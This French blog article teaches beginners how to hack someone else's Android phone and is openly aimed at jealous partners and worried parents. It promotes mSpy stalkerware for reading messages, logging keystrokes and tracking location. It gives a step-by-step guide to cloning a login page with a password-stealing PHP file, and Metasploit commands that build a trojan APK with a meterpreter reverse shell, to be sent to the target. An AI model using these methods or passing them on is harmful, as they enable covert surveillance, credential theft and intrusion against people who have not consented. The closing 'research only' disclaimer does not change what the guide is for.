Comment pirater un telephone portable à distance android – Un guide adapté aux débutants

0 commentaires

Les téléphones portables font désormais partie intégrante de nos vies. Ils détiennent une grande quantité de renseignements personnels et sont devenus, à eux seuls, presque tous les assistants personnels. Pour ces raisons, l’une des recherches Google les plus courantes est en relation avec le piratage d’un téléphone Android.

Que vous soyez un parent inquiet ou un conjoint jaloux, les raisons de vouloir pirater un téléphone portable de quelqu’un varient. Dans cet article, nous allons couvrir quelques techniques de piratage Android, tels que :

  • Outils de renifleur
  • Applications de piratage Android
  • Kali Linux
  • Hameçonnage

6 outils de renifleur Android que vous devriez vérifier

Comme la plupart des appareils numériques, les téléphones Android s’appuient également sur le code pour exécuter des commandes spécifiques. Par conséquent, de nombreuses entreprises ont appris à exploiter ce code grâce à des logiciels dédiés.

Ce type de logiciel est également connu sous le nom d’outils de renifleur Android, et il est livré avec une large gamme de possibilités. Ils peuvent déboguer, modifier ou même effectuer des modifications avancées. De plus, ces outils fonctionnent souvent sur des dispositifs enracinés et non enracinés.

Vous ne devez télécharger ces applications qu’à partir de sources installées. Sinon, vous risquez de télécharger une application malveillante ou illégale.

Voici 6 outils de renifleur d’appareil Android et applications de piratage qui peuvent être utilisés pour accomplir des tâches spécifiques :

  1. ZAnti
  2. CSPloit
  3. Fing Network tools
  4. Network Manager
  5. Orbot
  6. NMap

Boîte à outils de piratage ZAnti pour les tests de pénétration Android

ZAnti Test de pénétration est un puissant outil de reniflement d’appareil Android qui est équipé de certaines fonctionnalités avancées. À savoir, l’application de piratage permet aux utilisateurs d’utiliser des techniques malveillantes pour localiser les vulnérabilités du système.

Cependant, pour obtenir un accès complet à toutes les fonctionnalités, vous devez utiliser cette application de piratage sur les appareils enracinés. Parmi les choses que vous pouvez faire avec ZAnti :

  • injections SQL
  • Force brute
  • Un homme au milieu

CSPloit – Piratez un téléphone Android depuis un ordinateur à distance

CSPloit est encore une autre application de piratage cool qui peut être utilisé pour pirater des appareils Android à partir d’un ordinateur à distance. Tout comme ZAnti, cette application de piratage ne fonctionne également que sur les appareils avec root.

Il est aimé par de nombreux pirates éthiques grâce à son large éventail de possibilités, dont certaines comprennent :

  • Reniflage de mot de passe
  • Empoisonnement du cache DNS
  • Forger des paquets de données TCP/UDP
  • Rupture des connexions serveur
  • Piratage de sessions Web
  • Cartographie des réseaux locaux

Fing Network Tools: Piratez un mot de passe Android

Fing Network Tools est un analyseur réseau complet qui est principalement utilisé pour détecter et analyser les connexions réseau. L’objectif est d’améliorer la vitesse et les performances grâce à certaines fonctionnalités.

Les utilisateurs peuvent voir et contrôler tous les périphériques connectés, ainsi que pour autoriser ou accéder à leur réseau privé. D’autres possibilités sont les suivantes :

  • Tests de vitesse Wi-Fi et mobile
  • Découverte de tous les appareils connectés
  • Voir si quelqu’un vole votre Wi-Fi
  • Reconnaissance d’adresse IP
  • Analyse avancée des téléphones portables

Network Manager: Piratez un téléphone Android lorsqu’il est verrouillé

Network Manager est une autre option d’application de piratage professionnel qui est utilisée pour analyser et dépanner les connexions Wi-Fi. Cependant, gardez à l’esprit que  les fonctionnalités telles que la capture de paquets nécessitent un accès root. 

Heureusement, toutes les options ne nécessitent pas d’enracinement, donc si vous avez un appareil non enraciné, vous pourrez l’utiliser aussi. Voici quelques-unes des principales caractéristiques :

  • Les calculs d’IP
  • Traceroute
  • Graphique de surveillance de la téléphonie
  • Scanner Wi-Fi
  • Analyseur Wi-Fi

Orbot: Outil de piratage Android gratuit

Orbot est parmi les outils de piratage Android gratuits les plus populaires. Il agit comme une application proxy qui permet aux utilisateurs de rester entièrement anonymes lors de la navigation sur le Web ou en essayant de pirater quelqu’un.

Orbot crypte tout le trafic utilisateur pour s’assurer que votre confidentialité reste intacte. Il utilise le réseau TOR, ainsi que VPN. En outre, vous pouvez également l’utiliser pour découvrir à l’envers les vulnérabilités d’exploitation potentielles.

Nmap: Piratez un Android via le Wi-Fi

Enfin, nous avons NMap, une autre application de scanner réseau. Vous pouvez utiliser cette application pour aider vos efforts de piratage Android ou pour vous assurer que vos appareils sont sans exploitation. Il est livré avec un ensemble complet d’options, telles que la découverte des appareils qui volent votre connexion Internet.

Contrairement à beaucoup d’autres applications de cette liste, NMap fonctionne très bien sur les appareils enracinés et non enracinés.

Cependant,  certaines options disponibles pour un accès root . Il est surtout connu pour sa fonction de cartographie des réseaux connectés.

Comment pirater un téléphone Android à l’aide d’un autre téléphone Android

Pirater un téléphone Android en utilisant un autre téléphone portable Android semble presque impossible, non ? Pas vraiment. Vous n’avez besoin que d’une seule application pour effectuer cette action.

mSpy est un outil de piratage Android complet qui est plein de fonctionnalités étonnantes. Ce qui rend cette application de piratage si grand est le fait qu’il a plusieurs options d’espionnage – un enregistreur de frappe et la surveillance directe du téléphone Android.

Contrairement à la plupart des autres applications, celle-ci est entièrement éthique et légale à utiliser. Cette application n’utilise pas les techniques réelles de piratage pour accéder à l’appareil cible. Par conséquent, il n’est pas considéré comme un véritable piratage, mais plutôt comme une surveillance.

mSpy est très facile à utiliser, et il est totalement adapté aux débutants. Il  nécessite un accès physique, cependant, et certaines fonctionnalités plus avancées peuvent nécessiter un root. 

Le processus d’installation ne prend que quelques minutes, après quoi vous pourrez tout surveiller à travers un écran d’accueil du panneau de contrôle même s’ils suppriment l’historique web sur leur Android.

L’option de surveillance vous permet de :

  • Voir tous les messages SMS entrants et sortants
  • Afficher tous les appels téléphoniques entrants et sortants
  • Utiliser le GPS pour obtenir l’emplacement de l’équipement cible
  • Accédez aux comptes de médias sociaux – Facebook, Snapchat, Skype, Viber, WhatsApp, etc.

D’autre part, sa fonction keylogger permet aux utilisateurs de suivre toutes les frappes effectuées sur l’équipement cible. Il enregistre chaque coup et chaque clic, permettant aux utilisateurs de rassembler des informations critiques. Vous pouvez l’utiliser pour voir l’historique des recherches et des téléchargements, les conversations, les identifiants de connexion, etc. Les deux processus d’installation suivent le même principe.

Achetez un abonnement → téléchargez le logiciel → suivez les instructions de configuration → installez-le sur l’appareil cible, et c’est tout.

Comment pirater un téléphone Android en envoyant un lien

Vous pouvez également opter pour une méthode de piratage Android qui utilise un lien de téléchargement pour obtenir les informations d’identification de la personne cible. Cette technique est également connue sous le nom de hameçonnage, un moyen populaire dans le monde du piratage.

Attention, cette méthode est un peu plus détaillée et prend beaucoup de temps. Vous devez avoir  une connaissance intermédiaire des ordinateurs pour pouvoir l’exécuter. 

Il fonctionne en créant une fausse page de connexion, comme Facebook, et en convainquant la personne cible d’ouvrir le lien. C’est comme un mélange de codage et d’ingénierie sociale. Commençons par créer une page d’hameçonnage. Ci-dessous, vous trouverez un guide détaillé.

Utilisez cette méthode à vos propres risques. Si elle est utilisée pour compromettre la vie privée d’une personne de son plein gré, elle peut entraîner des amendes ou d’autres conséquences juridiques.
  1. Choisissez une plateforme que vous souhaitez imiter. Visez les plateformes populaires dont votre cible fait partie, comme Facebook, Skype, etc.
  2. Obtenez le code HTML de la page Web en cliquant avec le bouton droit sur le site Web et en choisissant Afficher la source.
  3. Vous verrez une fenêtre avec du code. Sélectionnez tout le code, copiez-le et collez-le dans un document .txt du Bloc-notes.
  4. Accédez à Enregistrer sous, remplacez le Type de sauvegarde par Tous les fichiers et nommez-le index.html
  5. Créez un fichier PHP pour voler le mot de passe ; vous pouvez trouver des exemples de codes en ligne. Collez-le dans le Bloc-notes et enregistrez-le en tant que post.php
  6. Choisissez un service d’hébergement gratuit pour créer un faux site Web qui est identique à l’original.
  7. Téléchargez vos fichiers récemment créés sur le serveur FTP principal du site Web.
  8. Assurez-vous de nommer le site quelque chose de similaire à l’original.
  9. Envoyez le lien de votre site Web à la personne cible et attendez qu’elle l’ouvre.
  10. Une fois fait, vous recevrez leur accès à l’appareil et les informations d’identification.

Comment pirater les téléphones Android à distance en utilisant Kali Linux

Kali Linux est un outil de piratage omniprésent utilisé par les pirates pour accéder à d’autres appareils. Il s’agit d’un système d’exploitation qui peut être installé sur un ordinateur ou un disque virtuel. Cependant, gardez à l’esprit que  c’est une méthode avancée qui est très compliquée et prend beaucoup de temps. L’option Installer à partir de sources inconnues doit être activée pour que cet exploit fonctionne. En outre, ce piratage pourrait ne pas s’appliquer à tous les appareils Android. 

Si vous êtes débutant, vous feriez probablement mieux d’utiliser les applications d’espionnage mentionnées ci-dessus. Si vous êtes prêt à le faire, voici un petit guide sur la façon de le faire. Nous allons diviser le guide en trois sous-catégories pour votre commodité.

Première partie – Démarrage de Kali Linux

  • Ouvrez un terminal et créez un fichier Trojan.apk en tapant msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk.
  • L’adresse LHOST dans le texte ci-dessus doit être remplacée par votre adresse IP réelle
  • Ouvrez un autre terminal pendant la création du fichier
  • Ouvrez la console Metasploit en tapant msfconsole

hack android using kali

Deuxième partie – Créez un écouteur

  • Une fois chargé, préparez l’exploit multi-handler et tapez use exploit/multi/handler

hack android using kali 2

  • Créez une charge utile inversée pour Android/meterpreter/reverse_tcp
  • Définissez le type LHOST en tapant set LHOST 192.168.0.4. Utilisez votre adresse IP privée

hack-android-using-kali-remotely

Partie 3 – Commencez l’exploit

  • Pour démarrer l’écouteur, il vous suffit de taper : exploit

hack-android-using-kali-remotely 2

  • Copiez l’application que vous avez créée sur votre appareil Android
  • Transférez le fichier via Dropbox ou d’autres services de transfert de fichiers
  • Envoyez le fichier à la cible et attendez qu’elle l’installe
  • Une fois qu’elles le font, l’invite meterpreter apparaîtra

meterpreter prompt

FAQ

Qu’est-ce qu’un logiciel espion Android et à quoi sert-il ?

Les logiciels espions modernes peuvent servir de passerelle personnelle vers l’appareil Android de quelqu’un d’autre. Les applications d’espionnage d’aujourd’hui regorgent de fonctionnalités intéressantes, dont la plupart vous permettent de surveiller toutes les communications des équipements cibles. En outre, ils fonctionnent sur d’autres systèmes d’exploitation, tels que iOS, Windows, macOS, etc.

Les fonctionnalités les plus courantes de l’application espion sont les suivantes :

  • Keylogging
  • Suivi des emplacements
  • Surveillance des journaux des appels
  • Accès aux comptes de médias sociaux – WhatsApp, Viber, Facebook, Instagram, Messenger, etc.
  • Données d’Internet
  • Espionnage de conversations

La popularité de ces applications a explosé ces dernières années, en raison de l’expansion d’Internet et des médias sociaux. Ce qui rend ces applications si pratiques, c’est qu’elles sont multi-usages. Voici quelques-unes des nombreuses utilisations possibles :

  • S’assurer que vos enfants sont en sécurité lorsqu’ils naviguent sur le Web
  • Veiller à la productivité de vos employés
  • Vous assurer de pouvoir récupérer plus facilement un appareil volé

Comment fonctionnent les applications de piratage Android ?

On peut installer une puissante technologie d’analyse de trois façons :

Réseaux Wi-Fi gratuits non protégés (lieux publics)

Lorsqu’une personne vérifie le réseau wifi et transmet des données via une connexion non sécurisée, les agresseurs peuvent surveiller toutes les actions qu’il commet alors qu’il reste sur l’Internet.

Les vulnérabilités du système d’exploitation de l’appareil peuvent créer les conditions préalables à la pénétration d’objets malveillants sur Android

Les fabricants de téléphones mobiles publient souvent des mises à jour des systèmes d’exploitation pour protéger les utilisateurs. Lorsque vous ne mettez pas à jour l’appareil Android à temps, il devient faible. Et c’est une cible facile pour les applications de piratage sans code à soumettre avant l’installation.

Les objets malveillants se cachent souvent dans les programmes ordinaires à première vue

La probabilité augmente si vous les téléchargez non pas via le magasin d’applications, mais à partir de sites Web ou de messages avec un lien de téléchargement. Si vous voulez quelqu’un pour installer l’application de piratage Android, lui envoyer un lien “infecté”, et l’utilisateur fera tout lui-même. Vous devrez enregistrer et connecter des appareils piratés avec votre compte.

Conclusion

Il y a plusieurs façons de pirater le téléphone Android de quelqu’un. Dans ce guide, nous avons étudié et analysé des méthodes allant de simples à très complexes. N’oubliez pas, cependant, que cet article est à des fins de recherche seulement.

Par conséquent, nous vous encourageons fortement à utiliser uniquement des méthodes éthiques et légales, telles que les applications d’espionnage. Sinon, vous pouvez être soumis à des conséquences juridiques.

0 commentaires

Commentaires

Votre adresse e-mail ne sera pas publiée.

Table des matières